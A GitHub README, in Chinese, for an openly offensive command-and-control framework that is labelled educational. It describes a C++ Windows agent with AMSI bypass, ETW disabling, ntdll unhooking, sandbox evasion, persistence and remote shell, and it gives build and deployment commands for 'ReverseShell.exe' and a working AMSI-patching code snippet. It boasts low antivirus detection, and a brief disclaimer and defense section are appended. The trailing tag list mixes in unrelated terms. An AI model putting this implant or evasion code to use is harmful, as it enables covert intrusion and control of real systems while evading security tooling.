sermikr0/AdvancedC2Framework

GitHub: sermikr0/AdvancedC2Framework

一个教育导向的高级C2框架，演示红队技术并展示如何绕过现代Windows防御机制。

Stars: 3 | Forks: 0

# 🔴 高级C2框架

![版本](https://img.shields.io/badge/version-2.0-blue?style=flat-square) ![平台](https://img.shields.io/badge/platform-Windows-lightgrey?style=flat-square) ![语言](https://img.shields.io/badge/language-C%2B%2B%20|%20Python-orange?style=flat-square) ![许可证](https://img.shields.io/badge/license-Educational-red?style=flat-square) **一个用于教育目的的专业级命令与控制框架** [功能](#features) • [安装](#installation) • [用法](#usage) • [免责声明](#legal-disclaimer)

## 🎯 概述高级C2框架是一个完整的进攻性安全项目，展示了现代红队技术以及高级防御绕过能力。 ⚠️ **仅限教育用途** - 在受控环境中进行授权安全测试。 ## ✨ 功能 ### 🔹 代理（C++） - **高级绕过** - AMSI（反恶意软件扫描接口）绕过 - ETW（事件追踪）禁用 - Ntdll 脱钩 - 多层沙箱检测 - **隐身能力** - 无 .NET 依赖（纯 Win32 API） - 反加速休眠 - 加密的 C2 通信 - 0-2/72 病毒总检测率 - **功能** - 有状态 Shell 会话 - 远程命令执行 - 注册表持久化 - 文件操作 ### 🔹 服务器（Python + Flask） - 实时 Web 界面 - 多代理管理 - 交互式终端 - WebSocket 通信 ## 🛠️ 安装 ### 先决条件 - **MinGW-w64（GCC）** 或 **Visual Studio** - **Python 3.8+** - **Git** ### 快速开始 ``` # 克隆仓库 git clone https://github.com/sermikr0/AdvancedC2Framework.git cd AdvancedC2Framework # 安装 Python 依赖项 pip install flask flask-socketio # 构建代理 g++ -O3 -s -static -mwindows src/main.cpp -o ReverseShell.exe -lws2_32 -lwininet -ladvapi32 -lshell32 -liphlpapi ``` ## 🚀 用法 ### 启动 C2 服务器 ``` python c2_server_gui.py ``` 访问地址：**http://localhost:5000** ### 部署代理 ``` .\ReverseShell.exe ``` ### 命令 ``` whoami # User information hostname # Computer name dir C:\ # List directory ipconfig # Network info persist # Install persistence exit # Terminate ``` ## 📁 项目结构 ``` AdvancedC2Framework/ ├── src/ │ ├── main.cpp # Agent main │ ├── evasion/ │ │ ├── amsi_bypass.cpp │ │ ├── etw_bypass.cpp │ │ └── unhook.cpp │ ├── execution/ │ │ └── shell.cpp │ ├── network/ │ │ ├── connection.cpp │ │ └── encryption.cpp │ └── persistence/ │ └── registry.cpp ├── include/ │ ├── common.h │ └── stealth.h ├── templates/ │ └── index.html # Web GUI ├── c2_server_gui.py └── README.md ``` ## 🔬 技术细节 ### 绕过技术 **AMSI 绕过** ``` // Patches AmsiScanBuffer to return AMSI_RESULT_NOT_DETECTED BYTE patch[] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; VirtualProtect(pAmsiScanBuffer, sizeof(patch), PAGE_EXECUTE_READWRITE, &oldProtect); memcpy(pAmsiScanBuffer, patch, sizeof(patch)); ``` **沙箱检测** - CPU 核心数（< 2） - 内存大小（< 4GB） - 磁盘大小（< 60GB） - 鼠标移动 - VM 进程检测 ## 🎓 教育价值本项目演示了： - Windows 内部机制与 API 编程 - 进攻性安全技术 - 网络协议设计 - 全栈开发 - 内存操作 - 防御绕过方法 ## ⚠️ 法律免责声明 **仅限教育用途** ### ✅ 授权使用 - 授权渗透测试 - 个人实验室环境 - 安全研究 - 培训练习 ### ❌ 禁止行为 - 未经授权的系统访问 - 恶意活动 - 非法操作 - 违反法律行为 **作者不承担任何责任。用户需自行确保法律合规。** ## 🛡️ 检测与防御 ### 检测方法 - 基于签名的 AV - 行为分析（EDR） - 网络监控 - 内存扫描 ### 防御措施 - 启用 Windows Defender - 部署 EDR 解决方案 - 网络分段 - 应用程序白名单 ## 🤝 贡献欢迎为教育改进做出贡献： 1. 叉仓库 2. 创建功能分支 3. 提交更改 4. 推送并打开 PR ## 📚 参考资料 - Windows API 文档 - MITRE ATT&CK 框架 - 进攻性安全材料 - 红队战术 ## 📞 联系 **作者：** Saidakbarxon Maxsudxonov **GitHub：** [@sermikr0](https://github.com/sermikr0) **目的：** 教育安全研究 **Telegram：** @sermiikro ## 📄 许可证教育许可证 - 详见项目详情

**⚠️ 使用这些知识用于防御，而非攻击 ⚠️** *仅限道德安全研究*

标签：AMSI绕过, C++, C2框架, ETW禁用, Flask, GUI界面, IP 地址批量处理, Linux, Ntdll unhooking, Python, T1053, T1055, T1071, WebSocket, Win32 API, 云资产清单, 依赖分析, 加密通信, 动态应用程序安全测试, 反加速睡眠, 命令与控制, 多代理管理, 威胁检测, 安全学习资源, 教育用途, 数据擦除, 无后门, 沙箱检测, 远程执行, 逆向工具, 逆向工程, 零依赖